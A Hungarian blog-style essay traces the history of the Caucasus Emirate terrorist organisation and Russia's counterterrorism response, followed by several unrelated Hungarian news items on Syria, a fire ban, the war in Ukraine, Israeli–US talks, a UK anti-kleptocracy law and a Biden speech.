Az Észak-Kaukázus legnagyobb őslakos népe a csecsen, akiknek önelnevezése a „nohcsij”. A csecsen nyelv a kaukázusi nyelvek közé sorolható. Vallásuk a szunnita muszlim, ami a 18. században vált meghatározóvá. Történelmük során több birodalom kereszttüzébe kerültek, így a 16-17. században az Oszmán Birodalom, majd Irán célvonalába.[iii] Az Orosz Birodalom a 19. század elején déli irányba kezdett terjeszkedni. Ezt követően 1829-ben jött létre az Észak-kaukázusi Imamátus, melynek pacifikálása hosszú évtizedekig tartott az orosz hatalom számára. A korszak emblematikus alakja Samil imám, aki 1834-1859 között vezette a csecsen felkelést az orosz cári csapatok ellen. Az előbb megnevezett imámot a mai napig nemzeti kultusz övezi. Végül 1864-ben az Orosz Birodalomhoz csatolták a csecsen területeket az Alekszej Petrovics Jermolov tábornok által vezetett erők. [iv]

1922-ben hozták létre a Csecsen Autonóm Körzetet a Hegyi Autonóm Szocialista Köztársaságon belül. Ezt követően 1934-ben a csecsen területet egyesítették az ingus autonóm területekkel és létrejött a Csecsen-Ingus Autonóm Szovjet Szocialista Köztársaság. A második világháború során, 1944-ben a csecsen népet kollektíve a németekkel való kollaborációval vádolták, aminek eredményeként az egész lakosságot (kb. fél millió főt) deportálták Kazahsztánba és Kirgíziába. A hruscsovi olvadás időszakában, 1957-ben térhettek vissza hazájukba. A szovjethatalom konszolidációja hosszú időt vett igénybe, hiszen a társadalomban fennmaradtak az általuk gyakorolt tradicionális-patriarchális elemek, mint a vérbosszú, a saría, az idősek feltétlen tisztelete és az erős vallásosság.[v]

A peresztrojka és glasznoszty időszakában nemzeti mozgalmak alakultak ki a függetlenség érdekében. Ezt követően 1991-ben Dzsohar Dudajev vezetésével kikiáltották függetlenségüket, és létrejött a Csecsen Köztársaság. A volt autonóm köztársaság másik része (Ingusföld) az Oroszországi Föderáció tagköztársasága lett, míg 1993-ban a csecsen vezetés ezzel ellentétesen a függetlenség mellett döntött. Ezután kezdődött meg az első csecsen háború (1994-1996), melynek lezártával Csecsenföld autonómiát kapott, de instabilitás jellemezte a köztársaságot. A források szerint a bűnözés és korrupció egyre többször jelent meg. A helyzet hozzájárult a társadalomban a radikális iszlám terjedéséhez és a terrorcselekmények számának növekedéséhez. Ennek következtében kezdetét vette a második csecsen háború (1999-2000). Ebben a háborúban már a szeparatista törekvések mellett a radikális iszlám is dominált és több terrorista akció vette kezdetét. Az első és második csecsen háború külön elemzés tárgyát képezhetné, így csak a legfontosabb, a cikk logikai szempontjából szükséges elemek kerülnek említésre. A második háború lezárását követően vette kezdetét a Vlagyimir Putyin által meghirdetett terrorizmus elleni harc a térségben, mely a 2010-es évekig tartott és sor került a csecsen hadurak likvidálására. A meghirdetett terrorizmus elleni harc a Nemzet és Biztonság egyik vonatkozó tanulmánya szerint hivatalosan 2009. április 16-án ért véget.[vi]

A Kaukázusi Emirátus

A Kaukázusi Emirátus nevű terrorszervezetet az Észak-Kaukázus ISIS-eként is szokták emlegetni a témában megjelent szakirodalomban. A terrorszervezet létrejötte és ideológiája összefüggésben áll a korábban bemutatott 19. századi orosz hódító tevékenységgel, mely során a függetlenségi harc állt a középpontban. Fontos kiemelni, hogy a 18. század során a térségben egy sajátos törzsi iszlám honosodott meg. Ennek értelmében az iszlám hitelemeket saját vallási tanaikhoz és hiedelmeikhez igazítva vették át, így az Észak-Kaukázusban gazvatnak nevezett dzsihád is más értelmezést nyert.[vii]

Az iszlám fundamentalizmus a 80-as évek második felében, majd a 90-es években rohamosan terjedni kezdett, központja Dagesztán és Csecsenföld lett. Ez az irányzat népszerűvé vált a fiatalok körében, akik a saría törvénykezésen nyugvó, Észak-Kaukázusra kiterjedő muszlim állam megvalósítására törekedtek. Mi lehetett ennek az oka? Hozzájárult a régióban lévő magas munkanélküliségi ráta, korrupció, a gazdasági hatalomért folyó harc a klánok között, a jövedelemelosztás és a szövetségi költségvetésből való részesedés közötti ellentét is, tehát kijelenthető, hogy a gazdasági és szociális nehézségek okán fordulnak a fiatalok a radikális eszmékhez.[viii] Fontos kiemelni, hogy elsősorban azokról a fiatalokról beszélhetünk, akik átélték az első és második csecsen háború borzalmait és akár egész családjukat elvesztették közben. A szociális és gazdasági problémák mellett hangsúlyozásra kerül az emberi jogok tiszteletben nem tartása és az orosz hatóságok és fegyveres erők kegyetlen fellépése.[ix]

A 90-es évek eseményeinek és a szervezet létrejöttének megértéséhez fontos kiemelni, hogy az iszlám vallás és az állami politika a korábban említett Dudajev elnöksége idején kezdett egybefonódni. Miután 1996-ban Dudajevet az orosz titkosszolgálat sikeresen likvidálta, Zeliman Janderbijev vette át a hatalmat. Őt követte 1997-ben Aszlan Maszhadov, akinek elnöksége idején a szociális és gazdasági problémák súlyosbodtak. A hatalmat a tejpek és szervezett bűnözői csoportok gyakorolták. Ekkor vette kezdetét a „harc” Samil Baszajev hadúr és Aszlan Maszhadov között. Baszajev a második háború során, – mely a dagesztáni betöréssel vette kezdetét Ibn Hattab vezetésével és 1999 nyarán kikiáltották a Dagesztáni Iszlám Államot – taktikai eszközként használta a radikális iszlámot, elnöksége idején alkotmányi szintre emelte az iszlám vallást és bevezetésre került a saría alapú törvénykezés. A Samil Baszajev tevékenysége idején végrehajtott terrorcselekmények között találhatjuk a 2002. október 23.-i Dubrovka Színház elleni támadást, a 2004-es moszkvai metró robbantást, illetve az orosz 9/11-ként emlegetett beszláni, általános iskolai túszdrámát is. [x]

Baszajev vezetésével a csecsen szeparatista mozgalom a regionális dzsihád eszméje felé kezdett fordulni, így jött létre 2005-ben a Kaukázusi Front Abdul Halim Szudajev vezetésével. Ennek egyik oka volt, hogy Baszajev likvidálása után és a 2004. szeptember 1-én zajló „beszláni túszdrámát” követően a kaukázusi terrorizmus változáson esett át. Ezt követően megfogalmazódott, hogy a kormányzati és katonai létesítmények ellen kell elkövetni a támadásokat.[xi]

Így jött létre 2007-ben a Kaukázusi Emirátus nevű szervezet, melyet Doku Hamatovics Umarov alapított. Ez egy ernyőszervezet, mely másik 5 szervezetet foglal magába, ezáltal vilajetekre tagozódik, melyeknek élén emírek állnak. Az általuk megfogalmazott dzsihád célja az iszlám állam kikiáltása az Észak-Kaukázusban, így egyfajta pánkaukázusi eszméről beszélhetünk. A terrorszervezet Doku Umarov alapítása óta a szunnita szalafita irányzat elveit követi és további célja az al-Kaida globális dzsihádjához való csatlakozás volt, melyet 2009-ben meg is tettek. Emellett hosszabb időre visszanyúlóan jelentős kapcsolatokat tartottak fent az al-Kaidával és a Talibánnal. [xii]

Mint korábban említésre került, a ’90-es évek és a 2000-es évek korai éveinek célpontjaival ellentétben a kormányzati és katonai létesítmények elleni támadásokat hangsúlyozta a szervezet vezetője. Ezt 2011-ben kiegészítették azzal, hogy a gazvat során az akciókat orosz belügyi és katonai szervezetek ellen hajtsák végre.  A Kaukázusi Emirátus ezen időszakában hajtották végre például a Nyevszkij Expressz elleni támadást (2009. november 27.), moszkvai metró támadását (2010. március 29.) és Domogyedovo repülőtér elleni támadást (2011. január 24.).[xiii]

Elmondható, hogy még Doku Umarov vezetősége idején (2007-2013) szakadás történt a szervezeten belül, ugyanis több emír esküt tett az ISIS-nek, és a szíriai polgárháború kirobbanásával több radikális eszmét valló személy hagyta el a térséget és távozott Irakba és Szíriába (kb. 5000 fő). 2015-ben felmerült a szervezet feloszlatásának gondolata, aminek hátterében a nemzetközi finanszírozása csökkenése állt, továbbá a régió csoportjai közül többen hűséget nyilvánítottak az Iszlám Államnak. A Kaukázusi Emirátust az ISIS egyik helyi ágazata „cserélte le” Wilayat al-Qawqaz” néven. Elmondható, hogy a 2016 után elkövetett támadásokért az ISIS vállalta a felelősséget. A szakirodalom kitér arra, hogy az Emirátus modellje az ISIS számára is inspiráció volt. Egy 2021-ben íródott tanulmány szerint jelenleg 400-1500 főre tehető a harcosok száma és működésük a csecsenföldi hegyvidékre korlátozódik.[xiv]

Orosz reakció

A terrorizmusra adott válaszreakció már az első csecsen háború során zajló túszdrámák után jelentkezett. Egy 1998-ban kiadott jogszabály fogalomtisztázó jellege mellett kilátásba helyezett olyan intézkedéseket, melyekben a kollektív büntetésről és különböző szűrőtáborok létesítéséről rendelkezett. A 2000-ben elfogadott kül-és biztonságpolitikai dokumentumok sora veszélyforrásként tekinti a terrorizmusra. A terrorizmus finanszírozása elleni harcról szóló törvényt 2002 nyarán hirdették ki. A stabilitás megteremtéséhez szükséges másik elem a Kremlhez lojális vezető kinevezését és a magas pénzbeli támogatást foglalja magába. A Kreml és Csecsenföld között egy kliens-patrónus viszony figyelhető meg, melyben a „stabil instabilitás” jelenik meg.[xv]A nemzetközi terrorizmus elleni harc során az észak-kaukázusi szervezet tevékenységére válaszreakcióként 2006. február 15-én létrehozták a Nemzeti Antiterrorista Bizottságot. A rendelkezésre álló forrás szerint a Bizottság célja, hogy „koordinálja a terrorizmus ellenes tevékenységgel foglalkozó szervezetek munkáját, kapcsolatot tartson fenn a külföldi társszervezetekkel”. A fő szerepet a Szövetségi Biztonsági Szolgálat kapta és helyi operatív törzseket hoztak létre. A Nemzeti Antiterrorista Bizottság külön Észak-Kaukázusi Szövetségi körzet elnöki követtel rendelkezik. Több nemzetközi emberi jogokkal foglalkozó szervezet elítélte bizonyos esetben munkájukat.[xvi] A 2014-es Szocsi Olimpa elhalasztása is felmerült a Kaukázusi Emirátus tevékenysége miatt. Az emír felszólította a modzsáhedekett, hogy „az őseik csontjai felett rendezendő olimpiát minden-Allah által adott-eszközzel akadályozzák meg…,és mindent tegyenek meg azért, hogy meghiúsítsák ezt az őseik csontjain való sátáni táncikálást..” A Kreml válaszreakcióként egy 2013-as augusztusi rendeletben a biztonság szavatolhatósága érdekében kijelentette, hogy blokád alá vonja Szocsi városát 2014. január 7-étől március 21-ig. Ennek értelmében szigorította a ki- és belépést, tiltott zónákat hozott létre, a külföldiek iratainak szigorú ellenőrzését helyezte kilátásba, szabályozza a fegyvertartást és a nemzetbiztonsági szervek hatáskörének erősítését hangsúlyozta.[xvii] A nyilvánosságra hozott terrorizmus elleni hadműveletek adataiban évről évre csökken a likvidált személyek és szervezek száma, akik kapcsolatba hozhatók a radikális megmozdulásokkal. Az orosz biztonsági erőknek fontos azon változásokra figyelniük, melyek az Irakból és Szíriából visszatérő dzsihadista harcosokkal járhatnak.[xviii]

Összegzés

A cikkben bemutatásra került az Észak-kaukázusi Szövetségi Köztársaság és az ott élő népek. Megismerhettük a Kaukázusi Emirátus történetét, melynek létrejötte és ideológiai iránya a 19. század nyúlik vissza, valamint szoros összefüggésben áll a 90-es években zajló első és második csecsen háborúval. A cikk során bemutatásra került a „gazvat”, azaz az észak-kaukázusi dzsihád, melynek jellege összefügg a kaukázusi népek által elszenvedett sérelmekkel és szenvedéssel. Az eltérő jelleget példázza, hogy alapvetően egy nemzetiségi indíttatású dzsihádról beszélhetünk, mely az oroszok és „kiszolgálóik” ellen irányul, továbbá megismerhettük az ISIS és a Kaukázusi Emirátus közötti kapcsolatot is.

Írta: Ignáth Dorina

Kiemelt kép forrása: flickr.com

Hivatkozások:

[i]Gyóni Gábor: A történelmi Oroszország népei. Adattár. Russica Pannonicana, 2011. 154-182.

[ii]Kiss Annamária: A radikális iszlám észak-kaukázusi terjedése, mint orosz biztonsági kihívás. Külügyi Szemle. 2013.(ősz). 77.

[iii]Uo. 164-165.

[iv]Lars Karl: Egy meg-és kitalált lázadó. Samil imám este az Orosz Birodalommal és a Szovjetunióval, 1859-1953. Világtörténet, 2014. 3. 483-484.

[v]Gyóni Gábor, 2011: 164-165.

[vi]Kiss Adrienn: Konfliktusok és önrendelkezés a Kaukázusban. Hadtudományos, 2016. 26. évfolyam.130-131.

Likvidálások menetéről bővebben lásd: Kiss Annamária, 2013: 82.

[vii]Gerencsér Árpád-Siposné Kecskeméthy Klára: Kaukázusi Emirátus (Imarat Kavkaz). Az Észak-Kaukázus ISIS-e. Hadtudomány. 31. évfolyam, 2. szám. 2021. 11-14.

[viii]Kiss Annamária, 2013: 79.

[ix] Gerencsér Árpád-Siposné Kecskeméthy Klára: 33.35.

[x]Kiss Annamária, 2013: 81-82.

[xi] Gerencsér Árpád-Siposné Kecskeméthy Klára: 19.

[xii]Gerencsér Árpád-Siposné Kecskeméthy Klára: 19-25.

[xiii]Uo.

[xiv]Uo. 26.32.

[xv]Kiss Annamária, 2013: 77-78.

[xvi]Uo. 35.

[xvii]Kiss Annamária, 2013: 86-89.

[xviii]Gerencsér Árpád-Siposné Kecskeméthy Klára: 27.

A A Kaukázusi Emirátus története bejegyzés először Biztonságpolitika-én jelent meg.

Törökország 400 katonáját vonná ki az északnyugat-szíriai Idlíb tartománybeli feszültségcsökkentési övezetből, az egységeket az Irak északi részén aktív Kurdisztáni Munkáspárt (PKK) harcosai ellen vetné be – adta hírül hétfőn az as-Sark al-Avszat című, londoni székhelyű pánarab napilap az Emberi Jogok Szíriai Megfigyelőközpontjára (OSDH) hivatkozva.

A szíriai polgárháború eseményeit nyomon követő, nagy-britanniai székhelyű OSDH szerint a török katonák feladata az Irak mentén végzett műveletek támogatása lenne.

Tavaly a török hadsereg nagyszabású katonai akciót indított a török-iraki határ térségében, illetve az Irak északi részén bujkáló kurd gerillák ellen, a műveletekben a török fegyveres erők különleges egységeit is bevetették. Az akció célja az Ankara – valamint az Egyesült Államok és az Európai Unió – által terroristának minősített PKK bázisainak megsemmisítése volt. Az akció során a török légierő iraki célpontokat is bombázott, emiatt Bagdad tiltakozott.

Elképzelhető, hogy a most kivonandó kontingenst újabb egységek követik majd – jegyezte meg az OSDH. A török parlament 2021 októberében két évvel meghosszabbította a hadsereg szíriai és iraki műveleteire adott mandátumát. Az északnyugat-szíriai, 2017-ben létrehozott létrehozott övezetben jelenleg mintegy 13 500 török katona állomásozik.

Az as-Sark al-Avszat hozzátette, hogy az elmúlt napokban több összecsapást jelentettek a Törökország támogatását élvező szíriai milíciák és a kurdok vezette Szíriai Demokratikus Erők (SDF) fegyveresei között az északkeleti Haszaka tartományból. A harcok nyomán több helyen áramkimaradásról számoltak be.

The post Szíria: Törökország több száz katonáját vonja ki a “feszültségcsökkentési” övezetből appeared first on .

Tűzgyújtási tilalom van érvényben az egész országban – közölte az Országos Katasztrófavédelmi Főigazgatóság (OKF).

A katasztrófavédelem közleménye szerint tilos tüzet gyújtani erdőkben, fásításokban, facsoportokban, útszéli fasorokban és ezek kétszáz méteres körzetében, még a kijelölt tűzrakóhelyeken is. Felhívták a figyelmet, hogy a csapadékmentes időjárás miatt nagy a szárazság, ezért amíg ki nem zöldül a természet, a legkisebb figyelmetlenség is könnyen hatalmas tűzhöz vezethet.

A tűzoltókat az idén már több mint 3500 alkalommal riasztották szabadtéri tűzhöz, a leégett terület nagysága csaknem hétezer hektár. A szabadtéri tüzek miatt öt ember sérült meg. A napokban a Kis-Balatonnál hatszáz hektárnyi terület égett le – emelték ki.

Azt javasolták, hogy a tüzek megelőzése érdekében a dohányosok ne dobják el az égő cigarettacsikket. Ahol engedélyezik a kerti zöldhulladék-égetést, ott csak az önkormányzati rendeletben meghatározott időben szabad ezt végezni. Mindig legyen a közelben víz és egy szerszám, amellyel kordában lehet tartani a tüzet – kérte a katasztrófavédelem.

Az aktuális tűzgyújtási tilalomról a www.erdotuz.hu és a www.katasztrofavedelem.hu honlapon elhelyezett térkép segítségével tájékozódhatnak az érdeklődők.

A Nemzeti Élelmiszerlánc-biztonsági Hivatal (Nébih) közleményben kérte, hogy mindenki legyen fokozottan körültekintő, Magyarországon ugyanis az erdőtüzek 99 százalékát emberi mulasztás okozza. Ahivatal szerint a gondatlan és szándékos tűzhasználat miatt megnövekedett a vegetációtüzek esetszáma a tűzgyújtási tilalommal eddig nem érintett megyékben is. “A kiszáradt talaj és biomassza miatt gyors tűzterjedés alakulhat ki akár már kisebb szél vagy lejtőhatás esetén. Megnő a keletkező tüzek intenzitása, valamint ugrótűz potenciálja, ami tovább gyorsíthatja a tűzterjedést” – figyelmeztetett a Nébih.

 

The post OKF: tűzgyújtási tilalom van az egész országban appeared first on .

A ukrán megyei vezetők megerősítették vasárnap, hogy rakétacsapások következtében teljesen megsemmisült két nagy olajraktár Nyugat-Ukrajnában.

Vitalij Koval, a nyugati országrészben fekvő Rivne megyei katonai adminisztráció vezetője az Eszpresszo ukrán televízió műsorában elmondta, hogy a légi csapás szombat este érte a Dubnóban található olajraktárt, amely ennek következében teljesen kiégett, személyi sérülés viszont nem történt.

Makszim Kozockij, a szintén nyugat-ukrajnai Lviv megye katonai adminisztrációjának vezetője pedig azt erősítette meg a Telegram üzenetküldő portálon, hogy a megyeszékhelyen, Lvivben semmisült meg az előző esti orosz rakétatámadásokban egy olajraktár. Emberáldozatokról ő sem adott hírt. Hozzátette, hogy a bázison egész éjjel, 12 órán át küzdöttek a lángok megfékezésével, mostanra már sikerült eloltani a tüzet.

Az orosz csapatok által megszállt csernobili atomerőműben mostanra sikerült leváltani az ukrán személyzet egy részét – közölte vasárnap Jurij Fomicsev, a lekapcsolt nukleáris létesítménytől északra fekvő Szlavutics város polgármestere egy tévéműsorban. Azokat a szakembereket váltották fel újakra, akik az Ukrajna elleni teljes körű orosz támadás kezdetétől, február 24-től voltak szolgálatban. Az erőművet már a támadás legelején elfoglalták az orosz erők. A polgármester szerint időről időre kapcsolatba tudnak lépni telefonon az ottmaradt személyzettel. Szavai szerint önkéntes alapon vállalták a szolgálatot azok, akiket váltásként odaküldtek dolgozni. Reményét fejezte ki, hogy az atomerőmű dolgozóit gyakrabban fogják tudni váltani. Fomicsev hozzáfűzte, hogy van elegendő élelmiszer a csernobili létesítményben, még a háború kezdete előtt feltöltötték a készleteket.

A polgármester arról is beszámolt, hogy az orosz erők már benyomultak a városba, amelyet jó ideje körbezárva tartottak. Eddig a településen hárman haltak meg katonai szolgálatteljesítés közben, két polgári személy pedig az orosz támadások elleni egyik tüntetésen sérült meg, amikor az orosz megszállók oszlatógránátot dobtak a demonstrálók közé.

A dél-ukrajnai Mikolajiv városában harminc lakos sebesült meg a megyeszékhelyet ért szombati orosz tüzérségi támadások következtében – írta a Telegramon Hanna Zamazjejeva megyei tanácselnök. Hozzátette, hogy vasárnap reggeli adatok alapján jelenleg 279, a támadásokban megsebesült helyi lakost ápolnak kórházban a megyében.

Az orosz hadsereg által megszállt dél-ukrajnai Herszon városában ismét tüntettek a helyi lakosok annak ellenére, hogy az orosz erők betiltották a demonstrációkat. A Moszt helyi hírportál jelentése szerint az orosz katonák lövéseket adtak le és oszlatógránátokat vetettek be a megszállás ellen tüntetőkkel szemben. Szemtanúk sérültekről is beszámoltak, pontos számuk azonban egyelőre nem ismert.

Az ukrán fegyveres erők eközben arról adtak hírt, hogy kiverték az orosz csapatokat a kelet-ukrajnai Harkiv megyében lévő Huszarivka településről. Közlésük szerint a harcok közben mintegy száz orosz katonával végeztek és hatvan haditechnikai eszközt semmisítettek meg. Ezt megelőzően az Azov ezred helyi területvédelmi egysége közölte, hogy Harkiv megyében felszabadították Vilhivka falut, mintegy hetven orosz katonát öltek meg és 27-et ejtettek fogságba.

A védelmi minisztérium nyilvánosságra hozta, hogy a teljes körű háború kezdete óta hét orosz tábornok vesztette életét az ukrajnai harcokban, közöttük a legmagasabb rangú tiszt Jakov Rezancev altábornagy volt, akit pénteken öltek meg.

Az ukrán vezérkar legfrissebb, vasárnapi összesítése szerint eddig hozzávetőlegesen 16 600 orosz katona esett el, mintegy ezer került fogságba. Az ukrán erők megsemmisítettek 121 orosz repülőgépet, 127 helikoptert, hét hadihajót, 582 harckocsit, csaknem 1700 páncélozott harcjárművet, mintegy háromszáz tüzérségi és 52 légvédelmi rendszert, valamint 93 rakéta-sorozatvetőt.

The post Orosz agresszió: Ukrajnában két nagy olajraktár megsemmisült appeared first on .

Izrael és az Egyesült Államok együtt próbálja megakadályozni Irán atomfegyverkezését – közölte Jaír Lapid izraeli külügyminiszter a Jeruzsálembe látogató Anthony Blinken amerikai külügyminiszterrel közösen tartott sajtótájékoztatóján vasárnap délelőtt.

“Irán nem izraeli probléma” – hangsúlyozta a Kan közszolgálati rádió szerint Lapid, amikor négyszemközti tárgyalásukat követően találkoztak az újságírókkal. “A világ nem engedheti meg magának a nukleáris Iránt, és azt sem, hogy a Forradalmi Gárda tovább terjessze a terrort az egész világon” – emelte ki a média képviselői előtt.

“Izrael mindent megtesz, amit szükségesnek tart az iráni nukleáris fejlesztés megállítása érdekében, bármit” – hangsúlyozta Lapid Jeruzsálem következetes álláspontját. A fontos elemekben egyformán vélekedünk. Eltökéltek vagyunk abban, hogy nem lesz atomfegyverük – tette hozzá az izraeli és az amerikai külpolitikai célok azonosságát nyomatékosítva.

Vannak nézeteltéréseink a nukleáris megállapodással és annak következményeivel kapcsolatban, de a nyílt és mély párbeszéd része erős barátságunknak – utalt az atomegyezményről zajló bécsi tárgyalásokon a megállapodásra törekvő Egyesült Államok és az azt elutasító Izrael közötti vitára az izraeli külügyi tárcavezető, aki azt is hangsúlyozta, hogy Jeruzsálem és Washington továbbra is együttműködik Irán atomhatalommá válásának megakadályozásában.

Lapid és Blinken Ukrajna orosz lerohanásáról is értekezett, és az izraeli oldal hangsúlyozta, hogy Jeruzsálem a háború első napja óta elítélte az inváziót.

“A két ország kapcsolata erős. Ez erős szövetség, mely közös értékeken alapul” – emelte ki az izraeli tárcavezető Jeruzsálem és Washington viszonyáról. Az amerikai külügyminiszter kijelentette, hogy az Egyesült Államok pártolja Naftali Bennett izraeli miniszterelnök törekvéseit a diplomáciai megoldásra az oroszok Ukrajna elleni háborújának lezárására.

“Washington és szövetségesei katonai segítséget nyújtanak Ukrajnának, hogy megvédje magát. Lehetőségünk volt találkozni ukrajnai kollégáinkkal, jó volt szemtől szemben látni őket” – nyilatkozta Blinken. “Bennett energiát fordított a diplomáciai megoldás megtalálására, és mi ezt támogatjuk” – tette hozzá.

A nap folyamán Blinken várhatóan találkozik Jichák Herzog izraeli államelnökkel, Bennettel, majd Beni Ganz védelmi miniszterrel, később Rámalláhban Mahmúd Abbásszal, a Palesztin Hatóság elnökével. Délután Izraelbe érkezik Egyiptom, Marokkó, Bahrein és az Egyesült Arab Emírségek külügyminisztere, hogy a Negev-sivatagban a négy arab állam bevonásával hatos külügyminiszteri csúcsot tartsanak elsősorban a közel-keleti térség aktuális kérdéseiről.

A “negevi csúcsot” Szdé Bókerben, a Kidma (előrejutás) nevű szállodában tartják, amelyet már teljes egészében lezártak. A megbeszélések után kötetlen vacsorán folytatják egymás véleményének megismerését és megértését a résztvevők. A vacsorán a Jediót Ahronót című újság hírportálja, a ynet szerint hal lesz a főfogás, és az iszlám országokra való tekintettel nem terveznek alkoholfogyasztást.

A szálloda David Ben Gurionnak, Izrael első miniszterelnökének Szdé Bóker kibucban ma már múzeumként működő szerény barakkja közelében található, ahová az Izraelt 1948-ban kikiáltó, és az ország területének 55 százalékát adó Negev-sivatag fejlesztését, lakhatóvá tételét szorgalmazó politikus a hatvanas években – 1973-as halálig – visszavonult.

A zsidó telepek bővítése ellen emelt szót az Egyesült Államok izraeli nagykövete
A ciszjordániai zsidó telepek bővítése ellen és a kétállami megoldás mellett emelt szót az Egyesült Államok izraeli nagykövete – jelentette a londoni székhelyű Middle East Monitor című portál. Tom Nides nagykövet leszögezte: “feldühíti” a Ciszjordániában és Kelet-Jeruzsálemben lévő telepek bővítése, amellyel szerinte a kétállami megoldást sodorják veszélybe. Kitért a Kelet-Jeruzsálem északkeleti részén található telepek bővítésének a tervére is, “katasztrófának” nevezve az elképzelést. “Nagyon fontos területről van szó, amelynek beépítése a főváros minden lehetőségétől megfosztaná a palesztinokat” – fogalmazott a közel-keleti ügyekkel foglalkozó portál jelentése szerint az amerikai diplomata. Jóllehet, hozzátette, hogy Washington változatlanul Jeruzsálemet tekinti Izrael fővárosának, leszögezte azt is, hogy “a város végső státuszáról a két fél dönt majd”. “Nem követhetünk el olyan butaságokat, amelyek aláássák a kétállami megoldást – jelentette ki.

The post Lapid: Izrael és az Egyesült Államok együtt próbálja megakadályozni Irán atomfegyverkezését appeared first on .

Érvénybe lépett kedden az az új brit törvény, amelynek alapján nem maradhatnak névtelenek a külföldi befektetők a brit ingatlanpiacon, és a vállalatalapításhoz is fel kell fedni a tényleges befektetők kilétét.

A brit kormány az Ukrajna elleni orosz invázió után terjesztette be a törvényjavaslatot a parlament elé, azzal a céllal, hogy névtelen külföldi befektetők ne moshassanak tisztára korrupt módon szerzett pénzeket Nagy-Britanniában. A jogszabály ugyanakkor minden külföldi befektetőre vonatkozik, nemcsak az orosz állampolgárokra.

A törvényt, amely évtizedekre visszamenőleg megköveteli a külföldi ingatlantulajdonosok kilétének felfedését, gyorsított eljárással fogadta el a londoni parlament és II. Erzsébet királynő kedden hirdette ki. A jogszabály alapján a nagy-britanniai ingatlantulajdonokról új regiszter készül, amely előírja az egyes ingatlanok külföldi tulajdonosainak kilétük felfedését a hatóságok előtt.

Azokat a vállalkozásokat, amelyek nem fedik fel tényleges haszonélvező tulajdonosaik kilétét, az új törvény erőteljesen korlátozza az adott ingatlanok értékesítésében, a szabálysértők pedig napi 2500 font (több mint 1,1 millió forint) pénzbírsággal vagy öt évig terjedő szabadságvesztéssel sújthatók.

A külföldi ingatlantulajdonosokról készülő új regiszternek Angliában és Walesben húsz évre, Skóciában 2014 decemberéig lesz visszamenőleges hatálya. Azoknak a külföldi vállalkozásoknak is már teljes körűen fel kell fedniük tulajdonosi hátterüket, amelyek február 28. és az új tulajdonosi regiszter elkészülte között adják el nagy-britanniai vagyoneszközeiket.

A brit kormány emellett a cégalapítás szabályait is teljesen újraírja. Az erről összeállított fehér könyv alapján bárkinek, aki az Egyesült Királyság területén vállalatot alapít, működtet, birtokol vagy ellenőrző vállalati részesedése van, igazolnia kell kilétét a brit cégbíróság előtt. Az új szabályozás alapján a cégbíróságnak joga lesz kétségbe vonni a kérdéses hitelességűnek tűnő adatszolgáltatást, és gyanú esetén értesítheti a brit biztonsági szolgálatokat.

A fehér könyv alapján külföldi vállalati ügynökök a továbbiakban nem alapíthatnak cégeket az Egyesült Királyságban kilétüket eltitkoló oligarchák nevében. Mindemellett azonnali hatállyal új “kleptokrácia-ügyosztály” jött létre a brit Országos Bűnüldözési Ügynökségen (National Crime Agency, NCA) belül a szankciók kikerülésére tett kísérletek megakadályozására és a külföldiek által korrupt módon szerzett nagy-britanniai vagyoneszközök feltárására.

A brit kormány az utóbbi napokban több száz orosz oligarcha ellen jelentett be nagy-britanniai vagyoneszközeik teljes befagyasztásával és beutazási tilalommal járó szankciókat az Ukrajna elleni orosz invázió miatt.

Köztük van Roman Abramovics, a Premier League-ben játszó londoni Chelsea futballklub tulajdonosa és Alekszej Miller, a Gazprom gázipari óriáscég vezérigazgatója. Az intézkedés után nem sokkal a Premier League megfosztotta Abramovicsot a Chelsea igazgatói tisztségétől.

Moszkva amerikai diplomatákat utasított ki
Bekérette az orosz külügyminisztérium az amerikai nagykövetség egyik magas rangú diplomatáját, akinek átadták az Oroszországból kiutasítandó amerikai diplomaták listáját, válaszul arra, hogy nem kívánatos személynek nyilvánították az orosz ENSZ-képviselet munkatársait. “Az amerikai féllel határozottan közölték, hogy az Egyesült Államok Oroszországgal szembeni bármilyen ellenséges fellépése határozott és megfelelő választ fog kapni” – állt a közleményben. Február végén az Egyesült Államokból kiutasították az orosz ENSZ-képviselet 12 alkalmazottját és a világszervezet titkárságának egy tagját. Az orosz külügyi tárca megjegyezte akkor, hogy mindez az ENSZ-titkárság nyilvánvaló beleegyezésével történik, és felszólította Washingtont, hogy hagyjon fel a további eszkalációval.

The post Orosz agresszió: “kleptokrácia-ügyosztály” alakult Nagy-Britanniában appeared first on .

Az ukrajnai háborúban hosszú küzdelemre kell felkészülni, de az Egyesült Államok kiáll az ukránok mellett – hangsúlyozta Joe Biden amerikai elnök a varsói Király Vár előterében szombaton mondott beszédében.

Kétnapos lengyelországi látogatását záró beszédében az amerikai elnök felidézte II. János Pál pápa és a lengyel Szolidaritás mozgalom szerepét a kommunizmus megdöntésében, majd az ukrajnai háborúra utalva aláhúzta: “a jelenleg zajló csatában nem napokon vagy hónapokon belül győzünk”, hosszú küzdelemre kell felkészülni.

Az ukrán külügyi és védelmi tárca vezetőivel szombaton Varsóban megtartott találkozó kapcsán Biden elmondta: az ukránoknak szánt üzenete azonos azzal, amelyet Dmitro Kulebával és Olekszij Reznyikovval megosztott. “Mellettetek állunk ki. Pont” – jelentette ki.

Felidézett más XX. századi közép-európai demokratikus törekvéseket is, köztük az 1956-os magyar forradalmat és a lengyel munkásfelkelést, valamint az 1968-as prágai tavasz folyamatát, majd azzal folytatta, hogy Oroszország ma saját területén “megfojtotta a demokráciát, és máshol is ugyanezt akarja tenni”.

Biden cinikus hazugságnak nevezte azt, hogy Putyin Ukrajna “nácitlanításáról” beszél. Ebben az összefüggésben kiemelte: Volodimir Zelenszkij a demokratikusan megválasztott ukrán elnök, “ráadásul zsidó, apai ágon a családját a holokausztban megsemmisítették”.

A Moszkvával folytatott korábbi tárgyalásaira utalva Biden elmondta: Washington az európai biztonság átláthatóságát akarta elérni diplomáciai úton, Moszkva azonban sorra elutasította javaslatait. “Oroszország kezdettől fogva erőszakot akart” – jelentette ki. Az orosz társadalomhoz szólva úgy fogalmazott: “tudjuk, hogy ti, oroszok, nem vagytok az ellenségeink. Nem hiszem, hogy örültök az ártatlan emberek gyilkolásának”.

Az európai államokat Biden arra szólította fel, hogy szabaduljanak az orosz fosszilis tüzelőanyagoktól való függőségtől. Az Egyesült Államok segít ebben – ígérte, utalva konkrétan a zöld energia alkalmazására. A Moszkvával szemben eddig kivetett szankciókról beszélve Biden azon véleményének adott hangot, hogy Oroszoroszág gazdasága “a következő években a felére zsugorodik”, az ország hamarosan kiesik a világ húsz legnagyobb gazdasága köréből.

